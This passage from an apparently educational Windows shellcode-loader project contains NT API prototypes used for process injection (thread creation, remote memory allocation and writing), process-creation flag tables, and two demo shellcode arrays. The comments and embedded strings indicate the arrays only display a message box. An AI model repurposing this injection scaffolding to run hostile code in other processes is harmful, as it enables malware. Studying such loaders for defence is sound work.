    _In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized
);

// Creates a thread in ProcessHandle starting at StartRoutine.
extern NTSTATUS (NTAPI *ntdll_NtCreateThreadEx) (
    OUT PHANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ProcessHandle,
    IN LPTHREAD_START_ROUTINE StartRoutine,
    IN PVOID Argument OPTIONAL,
    IN ULONG CreateFlags,
    IN ULONG_PTR ZeroBits,
    IN SIZE_T StackSize OPTIONAL,
    IN SIZE_T MaximumStackSize OPTIONAL,
    IN PVOID AttributeList OPTIONAL
);

// Reserves / commits memory in ProcessHandle; BaseAddress and RegionSize are
// updated in place.
extern NTSTATUS (NTAPI *ntdll_NtAllocateVirtualMemory)(
    _In_ HANDLE ProcessHandle,
    _Inout_ PVOID *BaseAddress,
    _In_ ULONG_PTR ZeroBits,
    _Inout_ PSIZE_T RegionSize,
    _In_ ULONG AllocationType,
    _In_ ULONG Protect
);

// Copies Buffer into ProcessHandle's address space.
// NOTE(review): the NT prototype published elsewhere (e.g. phnt / ReactOS)
// declares NumberOfBytesToWrite as SIZE_T and NumberOfBytesWritten as PSIZE_T.
// With PULONG here, a 64-bit callee would store 8 bytes through a caller's
// 4-byte ULONG; passing NULL (the parameter is OPTIONAL) sidesteps that.
// Confirm how callers use the out-parameter before relying on it.
extern NTSTATUS (NTAPI * ntdll_NtWriteVirtualMemory)(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN ULONG NumberOfBytesToWrite,
    OUT PULONG NumberOfBytesWritten OPTIONAL
);

// Creates a section object, optionally backed by FileHandle.
extern NTSTATUS (NTAPI *ntdll_NtCreateSection) (
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PLARGE_INTEGER MaximumSize OPTIONAL,
    IN ULONG SectionPageProtection,
    IN ULONG AllocationAttributes,
    IN HANDLE FileHandle OPTIONAL
);

// Load NTDLL by PEconv:
// Returns the module handle of the mapped image; v_size receives its
// virtual size (the signature is all that is visible here).
HMODULE load_ntdll(size_t &v_size);

// Initialize functions by PEconv
// Fills the function pointers above from ntdll_hndl; returns false on failure.
bool init_ntdll_func(HMODULE ntdll_hndl);

--------------------------------------------------------------------------------
/basic_ldr/ntdll_types.h:
--------------------------------------------------------------------------------
#pragma once
/*
based on: pstype.h by Alex Ionescu
*/
//
// Flags for NtCreateProcessEx
//
#define PROCESS_CREATE_FLAGS_BREAKAWAY 0x00000001
#define PROCESS_CREATE_FLAGS_NO_DEBUG_INHERIT 0x00000002
#define PROCESS_CREATE_FLAGS_INHERIT_HANDLES 0x00000004
#define PROCESS_CREATE_FLAGS_OVERRIDE_ADDRESS_SPACE 0x00000008
#define PROCESS_CREATE_FLAGS_LARGE_PAGES 0x00000010

//
// Process priority classes
//
#define PROCESS_PRIORITY_CLASS_INVALID 0
#define PROCESS_PRIORITY_CLASS_IDLE 1
#define PROCESS_PRIORITY_CLASS_NORMAL 2
#define PROCESS_PRIORITY_CLASS_HIGH 3
#define PROCESS_PRIORITY_CLASS_REALTIME 4
#define PROCESS_PRIORITY_CLASS_BELOW_NORMAL 5
#define PROCESS_PRIORITY_CLASS_ABOVE_NORMAL 6

//
// NtCreateProcessEx flags
//
// NOTE(review): a second spelling of the Flags bits. The first three agree with
// the PROCESS_CREATE_FLAGS_* table above (1, 2, 4), but PS_LARGE_PAGES is 8 while
// PROCESS_CREATE_FLAGS_LARGE_PAGES is 0x10 - 8 is the value of
// PROCESS_CREATE_FLAGS_OVERRIDE_ADDRESS_SPACE there. Confirm which table callers
// use before passing PS_LARGE_PAGES / PS_ALL_FLAGS.
#define PS_REQUEST_BREAKAWAY 1
#define PS_NO_DEBUG_INHERIT 2
#define PS_INHERIT_HANDLES 4
#define PS_LARGE_PAGES 8
#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
    PS_NO_DEBUG_INHERIT | \
    PS_INHERIT_HANDLES | \
    PS_LARGE_PAGES)

//
// Process base priorities
//
#define PROCESS_PRIORITY_IDLE 3
#define PROCESS_PRIORITY_NORMAL 8
#define PROCESS_PRIORITY_NORMAL_FOREGROUND 9

//
// Process memory priorities
//
#define MEMORY_PRIORITY_BACKGROUND 0
#define MEMORY_PRIORITY_UNKNOWN 1
#define MEMORY_PRIORITY_FOREGROUND 2

/*
based on ProcessHacker source:
*/

// Flags for RtlCreateProcessParametersEx (see ntdll_detached.h).
#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
#define RTL_USER_PROC_PROFILE_USER 0x00000002
#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004
#define RTL_USER_PROC_PROFILE_SERVER 0x00000008
#define RTL_USER_PROC_RESERVE_1MB 0x00000020
#define RTL_USER_PROC_RESERVE_16MB 0x00000040
#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080
#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100
#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000
#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000
#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000
#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000

--------------------------------------------------------------------------------
/basic_ldr/shellcodes.h:
--------------------------------------------------------------------------------
#pragma once

// Demo payloads used by the loader. Both only show a message box; they stand
// in for "the code to run" and carry no other functionality.

/*
msfvenom -a x86 --platform Windows -p windows/messagebox TEXT="Hello from the shellcode!" TITLE="Shellcode 32bit" -f c
*/
// 32-bit payload. Written as a string literal, so sizeof(messageBox32bit_sc)
// is one byte larger than the payload (the terminating NUL is included).
unsigned char messageBox32bit_sc[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x62\x69\x74\x58\x68\x65\x20"
"\x33\x32\x68\x6c\x63\x6f\x64\x68\x53\x68\x65\x6c\x31\xdb\x88"
"\x5c\x24\x0f\x89\xe3\x68\x21\x58\x20\x20\x68\x63\x6f\x64\x65"
"\x68\x68\x65\x6c\x6c\x68\x68\x65\x20\x73\x68\x6f\x6d\x20\x74"
"\x68\x6f\x20\x66\x72\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24"
"\x19\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff"
"\x55\x08";

/*
from: https://www.tophertimzen.com/blog/windowsx64Shellcode/
warning: this shellcode crashes on Windows 8 and above
will be replaced by some other soon...
*/
// 64-bit payload. Written as a brace-initialised array, so - unlike
// messageBox32bit_sc above - sizeof() is exactly the payload length (no NUL).
unsigned char messageBox64bit_sc[] = {
    0x48, 0x83, 0xec, 0x28, 0x48, 0x83, 0xe4, 0xf0, 0x65, 0x4c, 0x8b, 0x24,
    0x25, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0x64, 0x24, 0x18, 0x4d, 0x8b,
    0x64, 0x24, 0x20, 0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x7c, 0x24, 0x20,
    0x4d, 0x8b, 0x24, 0x24, 0x4d, 0x8b, 0x64, 0x24, 0x20, 0xba, 0x8e, 0x4e,
    0x0e, 0xec, 0x4c, 0x89, 0xe1, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xeb, 0x34,
    0x59, 0xff, 0xd0, 0xba, 0xa8, 0xa2, 0x4d, 0xbc, 0x48, 0x89, 0xc1, 0xe8,
    0x56, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x4d, 0x31, 0xc9, 0xeb, 0x2c,
    0x41, 0x58, 0xeb, 0x3a, 0x5a, 0x48, 0x31, 0xc9, 0xff, 0xd3, 0xba, 0x70,
    0xcd, 0x3f, 0x2d, 0x4c, 0x89, 0xf9, 0xe8, 0x37, 0x00, 0x00, 0x00, 0x48,
    0x31, 0xc9, 0xff, 0xd0, 0xe8, 0xc7, 0xff, 0xff, 0xff, 0x75, 0x73, 0x65,
    0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00, 0xe8, 0xcf, 0xff, 0xff,
    0xff, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6e,
    0x21, 0x00, 0xe8, 0xc1, 0xff, 0xff, 0xff, 0x30, 0x78, 0x64, 0x65, 0x61,
    0x64, 0x62, 0x65, 0x65, 0x66, 0x00, 0x49, 0x89, 0xcd, 0x67, 0x41, 0x8b,
    0x45, 0x3c, 0x67, 0x45, 0x8b, 0xb4, 0x05, 0x88, 0x00, 0x00, 0x00, 0x45,
    0x01, 0xee, 0x67, 0x45, 0x8b, 0x56, 0x18, 0x67, 0x41, 0x8b, 0x5e, 0x20,
    0x44, 0x01, 0xeb, 0x67, 0xe3, 0x3f, 0x41, 0xff, 0xca, 0x67, 0x42, 0x8b,
    0x34, 0x93, 0x44, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84,
    0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x39, 0xd7,
    0x75, 0xdd, 0x67, 0x41, 0x8b, 0x5e, 0x24, 0x44, 0x01, 0xeb, 0x31, 0xc9,
    0x66, 0x67, 0x42, 0x8b, 0x0c, 0x53, 0x67, 0x41, 0x8b, 0x5e, 0x1c, 0x44,
    0x01, 0xeb, 0x67, 0x8b, 0x04, 0x8b, 0x44, 0x01, 0xe8, 0xc3
};
--------------------------------------------------------------------------------